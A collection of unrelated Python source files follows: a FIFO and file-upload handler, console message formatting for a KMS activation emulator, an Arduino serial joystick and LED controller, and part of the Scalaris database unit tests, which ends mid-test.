def signalFifoExit(fifoThread, commPipes):
'''Under normal exit conditions the fifothread will exit when the fifo filehandles
are closed. However if the fifo filehandles were never opened by both ends then
the fifothread can be blocked waiting for them to open. To handle that case
we open both filehandles with O_NONBLOCK flag so that if the fifo thread reader
is listening it will be opened and closed, if not it will throw OSError exception
in which case the fifothread has already exited and closed the fifo filehandles.
'''
if fifoThread is None:
return
try:
pipeout = os.open(commPipes.name_out, os.O_RDONLY | os.O_NONBLOCK)
os.close(pipeout)
# trigger context swap to allow handleFifoRequests to open next pipe if needed
time.sleep(0.1)
pipein = os.open(commPipes.name_in, os.O_WRONLY | os.O_NONBLOCK)
os.close(pipein)
except OSError as err:
# No reader/writer listening on file so fifoThread already exited
# print('signalFifoExit: exception {}'.format(err))
pass
fifoThread.join(timeout=1)
if fifoThread.is_alive() is not False:
raise StateError('runSession: fifoThread not completed')
def handleDataRequest(cmd):
savedError = None
incomplete = True
while incomplete:
response = Web.sendDataMsgFromThread(cmd, timeout=60)
if response.get('status') != 200:
raise RequestError('handleDataRequest: status not 200: {}'.format(response.get('status')))
try:
data = unpackDataMessage(response)
except Exception as err:
logging.error('handleDataRequest: unpackDataMessage: {}'.format(err))
if savedError is None:
savedError = err
cmd['callId'] = response.get('callId', -1)
incomplete = response.get('incomplete', False)
if savedError:
raise RequestError('handleDataRequest: unpackDataMessage: {}'.format(savedError))
return data
def uploadFiles(request):
if 'cmd' not in request or request['cmd'] != "uploadFiles":
raise StateError('uploadFiles: incorrect cmd request: {}'.format(request))
if Web.wsDataConn is None:
# A remote fileWatcher hasn't connected yet
errStr = 'Waiting for fileWatcher to attach, please try again momentarily'
Web.setUserError(errStr)
return
try:
srcFile = request['srcFile']
compress = request['compress']
except KeyError as err:
Web.setUserError("UploadFiles request missing a parameter: {}".format(err))
return
# get the list of file to upload
cmd = listFilesReqStruct(srcFile)
response = Web.sendDataMsgFromThread(cmd, timeout=10)
if response.get('status') != 200:
Web.setUserError("Error listing files {}: {}".
format(srcFile, response.get('error')))
return
fileList = response.get('fileList')
if type(fileList) is not list:
Web.setUserError("Invalid fileList reponse type {}: expecting list".
format(type(fileList)))
return
if len(fileList) == 0:
response = {'cmd': 'uploadProgress', 'file': 'No Matching Files'}
Web.sendUserMsgFromThread(json.dumps(response))
return
for file in fileList:
try:
cmd = getFileReqStruct(file, compress=compress)
data = handleDataRequest(cmd)
# write the returned data out to a file
filename = response.get('filename')
if filename is None:
if 'data' in response: del response['data']
raise StateError('sendDataRequestToFile: filename field not in response: {}'.format(response))
# prepend with common output path and write out file
# note: can't just use os.path.join() because if two or more elements
# have an aboslute path it discards the earlier elements
global CommonOutputDir
outputFilename = os.path.normpath(CommonOutputDir + filename)
dirName = os.path.dirname(outputFilename)
if not os.path.exists(dirName):
os.makedirs(dirName)
writeFile(outputFilename, data)
response['filename'] = outputFilename
except Exception as err:
Web.setUserError(
"Error uploading file {}: {}".format(file, str(err)))
return
response = {'cmd': 'uploadProgress', 'file': file}
Web.sendUserMsgFromThread(json.dumps(response))
response = {'cmd': 'uploadProgress', 'file': '------upload complete------'}
Web.sendUserMsgFromThread(json.dumps(response))
|
pykms_Format.py
|
#!/usr/bin/env python3
from __future__ import print_function, unicode_literals
import re
import sys
import threading
try:
# Python 2.x imports
from StringIO import StringIO
import Queue as Queue
except ImportError:
# Python 3.x imports
from io import StringIO
import queue as Queue
pyver = sys.version_info[:2]
#----------------------------------------------------------------------------------------------------------------------------------------------------------
def enco(strg, typ = 'latin-1'):
if pyver >= (3, 0):
if isinstance(strg, str):
strgenc = strg.encode(typ)
return strgenc
else:
return strg
def deco(strg, typ = 'latin-1'):
if pyver >= (3, 0):
if isinstance(strg, bytes):
strgdec = strg.decode(typ)
return strgdec
else:
return strg
def byterize(obj):
def do_encode(dictio, key):
if isinstance(dictio[key], str) and len(dictio[key]) > 0 and key not in ['SecondaryAddr']:
dictio[key] = dictio[key].encode('latin-1')
elif hasattr(dictio[key], '__dict__'):
subdictio = dictio[key].__dict__['fields']
for subkey in subdictio:
do_encode(subdictio, subkey)
if pyver >= (3, 0):
objdict = obj.__dict__['fields']
for field in objdict:
do_encode(objdict, field)
return obj
def justify(astring, indent = 35, break_every = 100):
str_indent = ('\n' + ' ' * indent)
splitted = astring.split('\n')
longests = [(n, s) for n, s in enumerate(splitted) if len(s) >= break_every]
for longest in longests:
lines = []
for i in range(0, len(longest[1]), break_every):
lines.append(longest[1][i : i + break_every])
splitted[longest[0]] = str_indent.join(lines)
if len(splitted) > 1:
justy = str_indent.join(splitted)
else:
justy = str_indent + str_indent.join(splitted)
return justy
##----------------------------------------------------------------------------------------------------------------------------------------------------
ColorMap = {'red' : '\x1b[91m',
'green' : '\x1b[92m',
'yellow' : '\x1b[93m',
'blue' : '\x1b[94m',
'magenta' : '\x1b[95m',
'cyan' : '\x1b[96m',
'white' : '\x1b[97m'
}
ExtraMap = {'end' : '\x1b[0m',
'bold' : '\x1b[1m',
'dim' : '\x1b[2m',
'italic' : '\x1b[3m',
'underlined' : '\x1b[4m',
'blink1' : '\x1b[5m',
'blink2' : '\x1b[6m',
'reverse' : '\x1b[7m',
'hidden' : '\x1b[8m',
'strike' : '\x1b[9m'
}
ColorExtraMap = dict(ColorMap, **ExtraMap)
MsgMap = {0 : {'text' : "{yellow}\n\t\t\tClient generating RPC Bind Request...{end}", 'where' : "clt"},
1 : {'text' : "{white}<==============={end}{yellow}\tClient sending RPC Bind Request...{end}", 'where' : "clt"},
2 : {'text' : "{yellow}Server received RPC Bind Request !!!\t\t\t\t{end}{white}<==============={end}", 'where' : "srv"},
3 : {'text' : "{yellow}Server parsing RPC Bind Request...{end}", 'where' : "srv"},
4 : {'text' : "{yellow}Server generating RPC Bind Response...{end}", 'where' : "srv"},
5 : {'text' : "{yellow}Server sending RPC Bind Response...\t\t\t\t{end}{white}===============>{end}", 'where' : "srv"},
6 : {'text' : "{green}{bold}RPC Bind acknowledged !!!\n\n{end}", 'where' : "srv"},
7 : {'text' : "{white}===============>{end}{yellow}\tClient received RPC Bind Response !!!{end}", 'where' : "clt"},
8 : {'text' : "{green}{bold}\t\t\tRPC Bind acknowledged !!!\n{end}", 'where' : "clt"},
9 : {'text' : "{blue}\t\t\tClient generating Activation Request dictionary...{end}", 'where' : "clt"},
10 : {'text' : "{blue}\t\t\tClient generating Activation Request data...{end}", 'where' : "clt"},
11 : {'text' : "{blue}\t\t\tClient generating RPC Activation Request...{end}", 'where' : "clt"},
12 : {'text' : "{white}<==============={end}{blue}\tClient sending RPC Activation Request...\n\n{end}", 'where' : "clt"},
13 : {'text' : "{blue}Server received RPC Activation Request !!!\t\t\t{end}{white}<==============={end}", 'where' : "srv"},
14 : {'text' : "{blue}Server parsing RPC Activation Request...{end}", 'where' : "srv"},
15 : {'text' : "{blue}Server processing KMS Activation Request...{end}", 'where' : "srv"},
16 : {'text' : "{blue}Server processing KMS Activation Response...{end}", 'where' : "srv"},
17 : {'text' : "{blue}Server generating RPC Activation Response...{end}", 'where' : "srv"},
18 : {'text' : "{blue}Server sending RPC Activation Response...\t\t\t{end}{white}===============>{end}", 'where' : "srv"},
19 : {'text' : "{green}{bold}Server responded, now in Stand by...\n{end}", 'where' : "srv"},
20 : {'text' : "{white}===============>{end}{blue}\tClient received Response !!!{end}", 'where' : "clt"},
21 : {'text' : "{green}{bold}\t\t\tActivation Done !!!{end}", 'where' : "clt"},
-1 : {'text' : "{white}Server receiving{end}", 'where' : "clt"},
-2 : {'text' : "{white}\n\n\t\t\t\t\t\t\t\tClient sending{end}", 'where' : "srv"},
-3 : {'text' : "{white}\t\t\t\t\t\t\t\tClient receiving{end}", 'where' : "srv"},
-4 : {'text' : "{white}\n\nServer sending{end}", 'where' : "clt"}
}
def pick_MsgMap(messagelist):
pattern = r"(?<!\{)\{([^}]+)\}(?!\})"
picktxt, pickarrw = [ [] for _ in range(2) ]
for messageitem in messagelist:
picklist = re.sub(pattern, '*', messageitem['text'])
picklist = list(filter(None, picklist.split('*')))
picktxt.append(picklist[0])
try:
pickarrw.append(picklist[1])
except IndexError:
pass
return picktxt, pickarrw
def unshell_MsgMap(arrows):
unMsgMap = {}
for key, values in MsgMap.items():
txt = pick_MsgMap([values])
if txt[0][0] in arrows:
unMsgMap.update({txt[1][0] : values['where']})
else:
unMsgMap.update({txt[0][0] : values['where']})
return unMsgMap
#-------------------------------------------------------------------------------------------------------------------------------------------------------
# https://stackoverflow.com/questions/230751/how-to-flush-output-of-print-function
if pyver < (3, 3):
old_print = print
def print(*args, **kwargs):
flush = kwargs.pop('flush', False)
old_print(*args, **kwargs)
if flush:
file = kwargs.get('file', sys.stdout)
file.flush() if file is not None else sys.stdout.flush()
# https://ryanjoneil.github.io/posts/2014-02-14-capturing-stdout-in-a-python-child-process.html
class ShellMessage(object):
view = None
class Collect(StringIO):
# Capture string sent to stdout.
def write(self, s):
StringIO.write(self, s)
class Process(object):
def __init__(self, nshell):
self.nshell = nshell
self.print_queue = Queue.Queue()
def run(self):
if not ShellMessage.view:
return
# Start thread process.
print_thread = threading.Thread(target = self.spawn(), args=(self.print_queue,))
print_thread.setDaemon(True)
print_thread.start()
# Do something with output.
toprint = self.read(0.1) # 0.1 s to let the shell output the result
# Redirect output.
if sys.stdout.isatty():
print(toprint)
else:
from pykms_GuiBase import gui_redirect # Import after variables creation.
gui_redirect(toprint)
def spawn(self):
# Save everything that would otherwise go to stdout.
outstream = ShellMessage.Collect()
sys.stdout = outstream
try:
# Print something.
if isinstance(self.nshell, list):
for n in self.nshell:
print(MsgMap[n]['text'].format(**ColorExtraMap), flush = True)
else:
print(MsgMap[self.nshell]['text'].format(**ColorExtraMap), flush = True)
finally:
# Restore stdout and send content.
sys.stdout = sys.__stdout__
try:
self.print_queue.put(outstream.getvalue())
except Queue.Full:
pass
def read(self, timeout = None):
try:
toprint = self.print_queue.get(block = timeout is not None, timeout = timeout)
self.print_queue.task_done()
return toprint
except Queue.Empty:
return None
def unshell_message(ansi_string, m):
ansi_find = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
ansi_list = re.findall(ansi_find, ansi_string)
ansi_indx_start = [ n for n in range(len(ansi_string)) for ansi in list(set(ansi_list)) if ansi_string.find(ansi, n) == n ]
ansi_indx_stop = [ n + len(value) for n, value in zip(ansi_indx_start, ansi_list)]
ansi_indx = sorted(list(set(ansi_indx_start + ansi_indx_stop)))
msgcolored = {}
ColorMapReversed = dict(zip(ColorMap.values(), ColorMap.keys()))
ExtraMapReversed = dict(zip(ExtraMap.values(), ExtraMap.keys()))
for k in range(len(ansi_indx) - 1):
ansi_value = ansi_string[ansi_indx[k] : ansi_indx[k + 1]]
if ansi_value != '\x1b[0m':
tagname = "tag" + str(m).zfill(2)
if tagname not in msgcolored:
msgcolored[tagname] = {'color' : '', 'extra' : [], 'text' : ''}
if ansi_value in ColorMapReversed.keys():
msgcolored[tagname]['color'] = ColorMapReversed[ansi_value]
elif ansi_value in ExtraMapReversed.keys():
msgcolored[tagname]['extra'].append(ExtraMapReversed[ansi_value])
else:
msgcolored[tagname]['text'] = ansi_value
else:
m += 1
# Ordering.
msgcolored = dict(sorted(msgcolored.items()))
return msgcolored, m
|
arduinoController.py
|
import serial
import serial.tools.list_ports
import time
import threading
import re
import os
import logger
cf_logger = logger.get_logger(__name__)
TIME_BETWEEN_MESSAGES = 0.01
LED_MESSAGE_PREFIX = 17
RESET_MESSAGE_BYTE = 89
CALIBRATION_SAMPLES = 10
arduino_message_format = r'^(\d{1,3}) (\d{1,3}) ([01])$'
arduino_message_regex = re.compile(arduino_message_format)
def _get_port():
if os.name == 'nt': # if run on windows
ports = [str(port) for port in serial.tools.list_ports.comports()]
cf_logger.debug("serial ports found:")
cf_logger.debug(ports)
assert len(ports) > 0, 'no serial port found'
return ports[-1].split('-')[0].strip()
else: # linux support
return '/dev/ttyUSB0'
class ArduinoController:
def __init__(self):
self._serial_port = _get_port()
cf_logger.info('serial port name is %s' % self._serial_port)
self.ser = serial.Serial(self._serial_port, 9600)
cf_logger.info('connected')
self._data = None
self._run_thread = True
self._thread = threading.Thread(target=self._read_joystick)
self._valuesMutex = threading.Lock()
self._serMutex = threading.Lock()
self._thread.start()
self.reset_leds()
self._set_defaults()
cf_logger.info('Arduino board ready to use')
def disconnect(self):
cf_logger.info('disconnection')
self._run_thread = False
time.sleep(0.2)
cf_logger.info('close serial port')
self.ser.close()
# Set a color to a desired LED by controlling the RGB values
def set_led(self, led, r, g, b):
cf_logger.info('%d - (%d %d %d)' % (led, r, g, b))
checksum = (LED_MESSAGE_PREFIX + led + r + g + b) % 256
values = bytearray([LED_MESSAGE_PREFIX, led, r, g, b, checksum])
self._serMutex.acquire()
self.ser.write(values)
self._serMutex.release()
def reset_leds(self):
self._serMutex.acquire()
self.ser.write(bytearray([RESET_MESSAGE_BYTE]))
self._serMutex.release()
def get_button(self):
self._valuesMutex.acquire()
data = self._data
self._valuesMutex.release()
return data.split()[2] == '0'
def get_joystick_direction(self):
ax, ay = self._get_joystick_position()
if abs(ax - self._default_x) < 20 and abs(ay - self._default_y) < 20:
return [0, 0]
ax = -(ax - self._default_x)
ay = -(ay - self._default_y)
return [ax, ay]
def _set_defaults(self):
start = time.time()
while True:
if self._data:
break
if time.time() - start > 5:
raise Exception('time out waiting for arduino data')
time.sleep(0.1)
time.sleep(0.1)
axs = []
ays = []
for _ in range(CALIBRATION_SAMPLES):
ax, ay = self._get_joystick_position()
axs.append(ax)
ays.append(ay)
time.sleep(0.05)
self._default_x = max(set(axs), key=axs.count)
self._default_y = max(set(ays), key=ays.count)
assert axs.count(self._default_x) > 0.7 * CALIBRATION_SAMPLES, 'default samples are not stable enough - ax'
assert ays.count(self._default_y) > 0.7 * CALIBRATION_SAMPLES, 'default samples are not stable enough - ay'
#Get the Joystick position as a pair of x and y value.
def _get_joystick_position(self):
self._valuesMutex.acquire()
data = self._data
self._valuesMutex.release()
values = [int(x) for x in data.split()]
return values[1], values[0]
def _read_joystick(self):
while self._run_thread:
self._serMutex.acquire()
if self.ser.inWaiting() == 0:
self._serMutex.release()
time.sleep(TIME_BETWEEN_MESSAGES / 2)
continue
line = self.ser.readline()
self._serMutex.release()
try:
line = line.decode('UTF-8').rstrip("\r\n")
except:
cf_logger.warning('decodeing line failed %s'%line)
continue
if arduino_message_regex.match(line):
self._valuesMutex.acquire()
self._data = line
self._valuesMutex.release()
else:
cf_logger.warning('wrong line format - %s'%line)
time.sleep(TIME_BETWEEN_MESSAGES / 2)
cf_logger.info('read joystick thread ended')
|
scalaris_test.py
|
# Copyright 2011-2015 Zuse Institute Berlin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from scalaris import TransactionSingleOp, Transaction, PubSub, ReplicatedDHT, ScalarisVM,\
JSONConnection
import scalaris
import time, threading, json, socket
from datetime import datetime
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from random import shuffle
import unittest
# wait that long for subscription notifications to arrive
_NOTIFICATIONS_TIMEOUT = 60
_TEST_DATA = [
"ahz2ieSh", "wooPhu8u", "quai9ooK", "Oquae4ee", "Airier1a", "Boh3ohv5", "ahD3Saog", "EM5ooc4i",
"Epahrai8", "laVahta7", "phoo6Ahj", "Igh9eepa", "aCh4Lah6", "ooT0ath5", "uuzau4Ie", "Iup6mae6",
# "xie7iSie", "ail8yeeP", "ooZ4eesi", "Ahn7ohph", "Ohy5moo6", "xooSh9Oo", "ieb6eeS7", "Thooqu9h",
# "eideeC9u", "phois3Ie", "EimaiJ2p", "sha6ahR1", "Pheih3za", "bai4eeXe", "rai0aB7j", "xahXoox6",
# "Xah4Okeg", "cieG8Yae", "Pe9Ohwoo", "Eehig6ph", "Xe7rooy6", "waY2iifu", "kemi8AhY", "Che7ain8",
# "ohw6seiY", "aegh1oBa", "thoh9IeG", "Kee0xuwu", "Gohng8ee", "thoh9Chi", "aa4ahQuu", "Iesh5uge",
# "Ahzeil8n", "ieyep5Oh", "xah3IXee", "Eefa5qui", "kai8Muuf", "seeCe0mu", "cooqua5Y", "Ci3ahF6z",
# "ot0xaiNu", "aewael8K", "aev3feeM", "Fei7ua5t", "aeCa6oph", "ag2Aelei", "Shah1Pho", "ePhieb0N",
# "Uqu7Phup", "ahBi8voh", "oon3aeQu", "Koopa0nu", "xi0quohT", "Oog4aiph", "Aip2ag5D", "tirai7Ae",
# "gi0yoePh", "uay7yeeX", "aeb6ahC1", "OoJeic2a", "ieViom1y", "di0eeLai", "Taec2phe", "ID2cheiD",
# "oi6ahR5M", "quaiGi8W", "ne1ohLuJ", "DeD0eeng", "yah8Ahng", "ohCee2ie", "ecu1aDai", "oJeijah4",
# "Goo9Una1", "Aiph3Phi", "Ieph0ce5", "ooL6cae7", "nai0io1H", "Oop2ahn8", "ifaxae7O", "NeHai1ae",
# "Ao8ooj6a", "hi9EiPhi", "aeTh9eiP", "ao8cheiH", "Yieg3sha", "mah7cu2D", "Uo5wiegi", "Oowei0ya",
# "efeiDee7", "Oliese6y", "eiSh1hoh", "Joh6hoh9", "zib6Ooqu", "eejiJie4", "lahZ3aeg", "keiRai1d",
# "Fei0aewe", "aeS8aboh", "hae3ohKe", "Een9ohQu", "AiYeeh7o", "Yaihah4s", "ood4Giez", "Oumai7te",
# "hae2kahY", "afieGh4v", "Ush0boo0", "Ekootee5", "Ya8iz6Ie", "Poh6dich", "Eirae4Ah", "pai8Eeme",
# "uNah7dae", "yo3hahCh", "teiTh7yo", "zoMa5Cuv", "ThiQu5ax", "eChi5caa", "ii9ujoiV", "ge7Iekui",
"sai2aiTa", "ohKi9rie", "ei2ioChu", "aaNgah9y", "ooJai1Ie", "shoh0oH9", "Ool4Ahya", "poh0IeYa",
"Uquoo0Il", "eiGh4Oop", "ooMa0ufe", "zee6Zooc", "ohhao4Ah", "Uweekek5", "aePoos9I", "eiJ9noor",
"phoong1E", "ianieL2h", "An7ohs4T", "Eiwoeku3", "sheiS3ao", "nei5Thiw", "uL5iewai", "ohFoh9Ae"]
_TOO_LARGE_REQUEST_SIZE = 1024*1024*10 # number of bytes
class TestTransactionSingleOp(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for TransactionSingleOp()
def testTransactionSingleOp1(self):
conn = TransactionSingleOp()
conn.close_connection()
# Test method for TransactionSingleOp(conn)
def testTransactionSingleOp2(self):
conn = TransactionSingleOp(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
conn.close_connection()
# Test method for TransactionSingleOp.close_connection() trying to close the connection twice.
def testDoubleClose(self):
conn = TransactionSingleOp()
conn.close_connection()
conn.close_connection()
# Test method for TransactionSingleOp.read(key)
def testRead_NotFound(self):
key = "_Read_NotFound"
conn = TransactionSingleOp()
self.assertRaises(scalaris.NotFoundError, conn.read, str(self._testTime) + key)
conn.close_connection()
# Test method for TransactionSingleOp.read(key) with a closed connection.
def testRead_NotConnected(self):
key = "_Read_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.read, str(self._testTime) + key)
self.assertRaises(scalaris.NotFoundError, conn.read, str(self._testTime) + key)
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=str()) with a closed connection.
def testWriteString_NotConnected(self):
key = "_WriteString_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.write, str(self._testTime) + key, _TEST_DATA[0])
conn.write(str(self._testTime) + key, _TEST_DATA[0])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=str()) and TransactionSingleOp.read(key).
# Writes strings and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteString1(self):
key = "_WriteString1_"
conn = TransactionSingleOp()
for i in xrange(len(_TEST_DATA)):
conn.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to read the data:
for i in xrange(len(_TEST_DATA)):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=str()) and TransactionSingleOp.read(key).
# Writes strings and uses a single key for all the values. Tries to read the data afterwards.
def testWriteString2(self):
key = "_WriteString2"
conn = TransactionSingleOp()
for i in xrange(len(_TEST_DATA)):
conn.write(str(self._testTime) + key, _TEST_DATA[i])
# now try to read the data:
actual = conn.read(str(self._testTime) + key)
self.assertEqual(actual, _TEST_DATA[len(_TEST_DATA) - 1])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=list()) with a closed connection.
def testWriteList_NotConnected(self):
key = "_WriteList_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.write, str(self._testTime) + key, [_TEST_DATA[0], _TEST_DATA[1]])
conn.write(str(self._testTime) + key, [_TEST_DATA[0], _TEST_DATA[1]])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=list()) and TransactionSingleOp.read(key).
# Writes strings and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteList1(self):
key = "_WriteList1_"
conn = TransactionSingleOp()
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
conn.close_connection()
# Test method for TransactionSingleOp.write(key, value=list()) and TransactionSingleOp.read(key).
# Writes strings and uses a single key for all the values. Tries to read the data afterwards.
def testWriteList2(self):
key = "_WriteList2"
conn = TransactionSingleOp()
mylist = []
for i in xrange(0, len(_TEST_DATA) - 1, 2):
mylist = [_TEST_DATA[i], _TEST_DATA[i + 1]]
conn.write(str(self._testTime) + key, mylist)
# now try to read the data:
actual = conn.read(str(self._testTime) + key)
self.assertEqual(actual, mylist)
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()) with a closed connection.
def testTestAndSetString_NotConnected(self):
key = "_TestAndSetString_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.test_and_set, str(self._testTime) + key, _TEST_DATA[0], _TEST_DATA[1])
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, _TEST_DATA[0], _TEST_DATA[1])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()).
# Tries test_and_set with a non-existing key.
def testTestAndSetString_NotFound(self):
key = "_TestAndSetString_NotFound"
conn = TransactionSingleOp()
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, _TEST_DATA[0], _TEST_DATA[1])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=str()).
# Writes a string and tries to overwrite it using test_and_set
# knowing the correct old value. Tries to read the string afterwards.
def testTestAndSetString1(self):
key = "_TestAndSetString1"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.test_and_set(str(self._testTime) + key + str(i), _TEST_DATA[i], _TEST_DATA[i + 1])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i + 1])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=str()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=str()).
# Writes a string and tries to overwrite it using test_and_set
# knowing the wrong old value. Tries to read the string afterwards.
def testTestAndSetString2(self):
key = "_TestAndSetString2"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
try:
conn.test_and_set(str(self._testTime) + key + str(i), _TEST_DATA[i + 1], "fail")
self.fail('expected a KeyChangedError')
except scalaris.KeyChangedError as exception:
self.assertEqual(exception.old_value, _TEST_DATA[i])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()) with a closed connection.
def testTestAndSetList_NotConnected(self):
key = "_TestAndSetList_NotConnected"
conn = TransactionSingleOp()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.test_and_set, str(self._testTime) + key, "fail", [_TEST_DATA[0], _TEST_DATA[1]])
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, "fail", [_TEST_DATA[0], _TEST_DATA[1]])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()).
# Tries test_and_set with a non-existing key.
def testTestAndSetList_NotFound(self):
key = "_TestAndSetList_NotFound"
conn = TransactionSingleOp()
self.assertRaises(scalaris.NotFoundError, conn.test_and_set, str(self._testTime) + key, "fail", [_TEST_DATA[0], _TEST_DATA[1]])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=list()).
# Writes a list and tries to overwrite it using test_and_set
# knowing the correct old value. Tries to read the string afterwards.
def testTestAndSetList1(self):
key = "_TestAndSetList1"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.test_and_set(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]], [_TEST_DATA[i + 1], _TEST_DATA[i]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i + 1], _TEST_DATA[i]])
conn.close_connection()
# Test method for TransactionSingleOp.test_and_set(key, oldvalue=str(), newvalue=list()),
# TransactionSingleOp.read(key) and TransactionSingleOp.write(key, value=list()).
# Writes a string and tries to overwrite it using test_and_set
# knowing the wrong old value. Tries to read the string afterwards.
def testTestAndSetList2(self):
key = "_TestAndSetList2"
conn = TransactionSingleOp()
# first write all values:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
conn.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to overwrite them using test_and_set:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
try:
conn.test_and_set(str(self._testTime) + key + str(i), "fail", 1)
self.fail('expected a KeyChangedError')
except scalaris.KeyChangedError as exception:
self.assertEqual(exception.old_value, [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA) - 1, 2):
actual = conn.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
conn.close_connection()
# Test method for TransactionSingleOp.req_list(RequestList) with an
# empty request list.
def testReqList_Empty(self):
conn = TransactionSingleOp()
conn.req_list(conn.new_req_list())
conn.close_connection()
# Test method for TransactionSingleOp.req_list(RequestList) with a
# mixed request list.
def testReqList1(self):
key = "_ReqList1_"
conn = TransactionSingleOp()
readRequests = conn.new_req_list()
firstWriteRequests = conn.new_req_list()
writeRequests = conn.new_req_list()
for i in xrange(0, len(_TEST_DATA)):
if (i % 2) == 0:
firstWriteRequests.add_write(str(self._testTime) + key + str(i), "first_" + _TEST_DATA[i])
writeRequests.add_write(str(self._testTime) + key + str(i), "second_" + _TEST_DATA[i])
readRequests.add_read(str(self._testTime) + key + str(i))
results = conn.req_list(firstWriteRequests)
# evaluate the first write results:
for i in xrange(0, firstWriteRequests.size()):
conn.process_result_write(results[i])
results = conn.req_list(readRequests)
self.assertEqual(readRequests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
if (i % 2) == 0:
actual = conn.process_result_read(results[i])
self.assertEqual("first_" + _TEST_DATA[i], actual)
else:
try:
result = conn.process_result_read(results[i])
# a not found exception must be thrown
self.fail('expected a NotFoundError, got: ' + str(result))
except scalaris.NotFoundError:
pass
results = conn.req_list(writeRequests)
self.assertEqual(writeRequests.size(), len(results))
# now evaluate the write results:
for i in xrange(0, writeRequests.size()):
conn.process_result_write(results[i])
# once again test reads - now all reads should be successful
results = conn.req_list(readRequests)
self.assertEqual(readRequests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
actual = conn.process_result_read(results[i])
self.assertEqual("second_" + _TEST_DATA[i], actual)
conn.close_connection();
# Test method for TransactionSingleOp.write(key, value=bytearray()) with a
# request that is too large.
def testReqTooLarge(self):
conn = TransactionSingleOp()
data = ''.join('0' for _x in xrange(_TOO_LARGE_REQUEST_SIZE))
key = "_ReqTooLarge"
try:
conn.write(str(self._testTime) + key, data)
